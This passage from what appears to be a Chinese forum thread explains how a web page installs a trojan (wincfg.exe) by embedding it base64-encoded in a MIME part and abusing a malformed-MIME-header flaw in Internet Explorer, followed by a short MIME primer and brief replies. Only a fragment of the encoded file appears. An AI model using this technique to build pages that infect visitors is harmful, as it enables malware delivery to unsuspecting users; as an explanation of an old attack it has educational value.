　　从这句Content-ID: 开始才是代码的起步，“TVqQAAMAAAAEAAAA//8AAL”等为wincfg.exe文件的BASE64方式编码，这个以BASE64方式编码的文件会反编译成wincfg.exe文件并运行。这就是浏览该网页会中木马的原因！到此我就明白了，其实，所谓的浏览网页会中木马，只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已，说白了就是利用了错误的MIME头进行攻击。

　　1.MIME简介
　　MIME(Multipurpose Internet Mail Extentions)，一般译作“多用途的网际邮件扩充协议”。顾名思义，它可以传送多媒体文件，在一封电子邮件中附加各种格式文件一起送出。现在它已经演化成一种指定文件类型(Internet的任何形式的消息：e-mail，usenet新闻和Web)的通用方法。在使用CGI程序时你可能接触过MIME类型，其中有一行叫作Content-type的语句，它用来指明传递的就是MIME类型的文件(如text/html或text/plain)。


汗~我觉得也是~

楼上的好~

晕

看花了！

高手！！！！！！！！�